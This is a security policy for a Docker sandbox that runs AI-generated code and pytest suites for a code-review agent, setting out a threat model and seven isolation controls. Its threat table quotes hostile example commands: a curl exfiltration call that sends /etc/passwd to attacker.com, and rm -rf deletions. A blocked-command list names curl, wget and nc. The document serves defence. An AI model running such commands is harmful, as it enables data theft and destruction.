Sandbox Security Policy

Purpose

This document describes the security controls applied to the Docker-based code execution sandbox used by the Autonomous Code Review & Bug-Fix Agent.

Threat Model

The sandbox runs untrusted LLM-generated code and arbitrary pytest test suites from public GitHub repositories. The risk categories are:

| Threat | Example | Control |
| --- | --- | --- |
| Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` |
| Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60s timeout |
| Host filesystem access | `open('/etc/passwd')` | `--read-only`, volume-limited |
| Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) |
| Malicious commands | `rm -rf /workspace` | Command whitelist |
| Persistent state | Writing outside /workspace | `--read-only` + limited tmpfs |

Security Controls (7 Layers)

1. Network Isolation — `--network=none`

The container has no network access: no DNS, no HTTP, no TCP sockets. This is the most important control because it prevents data exfiltration and supply-chain attacks from untrusted test dependencies.

2. Memory cgroup — `--memory=2g`

The kernel OOM killer terminates the container if its memory use exceeds 2 GB. This keeps memory exhaustion, including the memory consumed by a fork bomb, from affecting the host.

3. CPU cgroup — `--cpus=2.0`

Limits the container to the CPU time of 2 cores. This prevents CPU saturation that would degrade other running containers or the host system.

4. Read-Only Filesystem — `--read-only --tmpfs=/tmp:size=256m`

The container's root filesystem is mounted read-only. Only two locations are writable:

/workspace — the cloned repo (bind-mounted, scoped to this run)
/tmp — tmpfs, 256 MB, wiped at container exit
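Layers 1 to 4 all map to `docker run` flags, so they can be assembled in one place. The following is a minimal sketch, not the project's actual executor: the function name `build_docker_args`, the image name `sandbox-image:latest`, and the workspace path are hypothetical, while the flag values are the ones stated in this policy.

```python
from pathlib import Path


def build_docker_args(workspace: Path, image: str, command: list[str]) -> list[str]:
    """Assemble a `docker run` argument list that applies layers 1-4."""
    return [
        "docker", "run",
        "--network=none",          # layer 1: no network access
        "--memory=2g",             # layer 2: memory cgroup limit
        "--cpus=2.0",              # layer 3: CPU limit
        "--read-only",             # layer 4: read-only root filesystem
        "--tmpfs=/tmp:size=256m",  # layer 4: writable scratch space
        "--volume", f"{workspace}:/workspace",  # bind-mount the cloned repo
        "--workdir", "/workspace",
        image,                     # hypothetical image name supplied by caller
        *command,
    ]


args = build_docker_args(Path("/tmp/run-123"), "sandbox-image:latest", ["pytest", "-q"])
print(" ".join(args))
```

Passing the arguments as a list rather than a shell string avoids a second layer of shell parsing on the host.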

5. Command Whitelist — `ALLOWED_COMMANDS`

Before any command reaches Docker, the executor checks the base command name against an allowlist: {git, pytest, python, python3, pip, pip3, cat, ls, echo, find, grep, head, tail, mkdir, cp, mv, touch, chmod}.

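Commands such as rm, curl, wget, bash, sh, and nc are blocked at this layer. Because only the base command name is checked, this layer does not restrict what an allowed interpreter such as python does; the other layers cover that case.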
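The allowlist check described above can be sketched as follows. This is an illustration under assumptions, not the executor's real code: the function name `is_allowed` is hypothetical, and the sketch treats the first shell token as the base command and requires an exact match, so a path such as `/usr/bin/rm` is rejected as well.

```python
import shlex

ALLOWED_COMMANDS = frozenset({
    "git", "pytest", "python", "python3", "pip", "pip3", "cat", "ls", "echo",
    "find", "grep", "head", "tail", "mkdir", "cp", "mv", "touch", "chmod",
})


def is_allowed(command: str) -> bool:
    """Return True only if the first token of `command` is on the allowlist."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        # Unbalanced quotes or similar parse errors: reject rather than guess.
        return False
    if not tokens:
        return False
    return tokens[0] in ALLOWED_COMMANDS


for candidate in ("pytest -q tests/", "rm -rf /workspace", "curl https://attacker.com"):
    print(candidate, "->", is_allowed(candidate))
```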

6. Non-Root User — `uid=1000`

All processes run as agent:agent (1000:1000). If an exploit gets past the command whitelist, it still runs without root privileges, so it cannot modify root-owned system files.

7. Timeout — 60 seconds SIGKILL

The executor enforces a hard 60-second timeout. On expiry, the container is killed with docker stop --time=0, which leaves no grace period before SIGKILL, so hung processes cannot consume resources indefinitely.
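One way to enforce such a timeout from Python is `subprocess.run` with its `timeout` argument, followed by a forced stop of the container. The sketch below is hedged: `run_with_timeout` and the `container_name` parameter are hypothetical names, and the returned dictionary shape is an assumption chosen to match the audit fields in this policy.

```python
import subprocess
import sys

TIMEOUT_SECONDS = 60


def run_with_timeout(cmd, timeout=TIMEOUT_SECONDS, container_name=None):
    """Run `cmd`; on timeout, force-stop the container and report timed_out."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return {"returncode": proc.returncode, "timed_out": False}
    except subprocess.TimeoutExpired:
        if container_name is not None:
            # --time=0 leaves no grace period before the container is killed.
            subprocess.run(["docker", "stop", "--time=0", container_name], check=False)
        return {"returncode": None, "timed_out": True}


# Demonstration with a local child process instead of a container.
slow = [sys.executable, "-c", "import time; time.sleep(5)"]
print(run_with_timeout(slow, timeout=0.5))
```

`subprocess.run` kills the direct child when the timeout expires, but that child is only the `docker run` client, so the explicit `docker stop` is what actually ends the container.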

Isolation Per Run

Each SWE-bench instance gets a fresh temporary directory as its workspace. The container is created with --rm so it is automatically deleted after each run. No state persists between runs.
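The per-run workspace lifecycle can be expressed as a context manager. This is a minimal sketch assuming the workspace is created with Python's `tempfile` module; the name `run_workspace` and the `demo-instance` identifier are hypothetical.

```python
import tempfile
from contextlib import contextmanager
from pathlib import Path


@contextmanager
def run_workspace(instance_id: str):
    """Yield a fresh workspace directory that is deleted when the run ends."""
    with tempfile.TemporaryDirectory(prefix=f"{instance_id}-") as tmp:
        # The repo would be cloned here and bind-mounted at /workspace
        # in a container started with --rm.
        yield Path(tmp)


with run_workspace("demo-instance") as workspace:
    existed_during_run = workspace.is_dir()
exists_after_run = workspace.exists()
print(existed_during_run, exists_after_run)
```

Tying cleanup to the `with` block means the directory is removed even if the run raises an exception.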

Audit Log

Every command executed in the sandbox is logged with:

instance_id
command (truncated to first 3 tokens for brevity)
returncode
elapsed_seconds
timed_out flag

Logs are written with structlog (JSON format in production) and ingested by the Prometheus/Grafana observability stack in Phase 8.
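The shape of one audit entry can be sketched as below. To keep the example self-contained it serializes with the standard-library `json` module rather than structlog, and it assumes "tokens" means whitespace-separated words; the function name `audit_record` and the sample values are hypothetical.

```python
import json


def audit_record(instance_id, command, returncode, elapsed_seconds, timed_out):
    """Build one audit entry; the command is cut to its first 3 tokens."""
    tokens = command.split()[:3]
    return {
        "instance_id": instance_id,
        "command": " ".join(tokens),
        "returncode": returncode,
        "elapsed_seconds": round(elapsed_seconds, 3),
        "timed_out": timed_out,
    }


record = audit_record(
    "demo-instance", "pytest -q tests/test_api.py -k smoke", 1, 12.3456, False
)
print(json.dumps(record))
```

Truncating the command keeps log lines short, at the cost of dropping arguments that may matter during an investigation.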

Known Limitations

Conda environments: Some SWE-bench repos require specific conda environments with C extensions. The current sandbox installs dependencies with pip only, which may cause test failures for repos with complex native dependencies.
Docker-in-Docker: The sandbox does not support running Docker inside Docker. Repos that spawn subprocesses to call Docker will fail at the network level.
Flaky tests: ~8% of SWE-bench issues have non-deterministic tests. These may burn retries even when the patch is correct. They are flagged under the flaky_test category.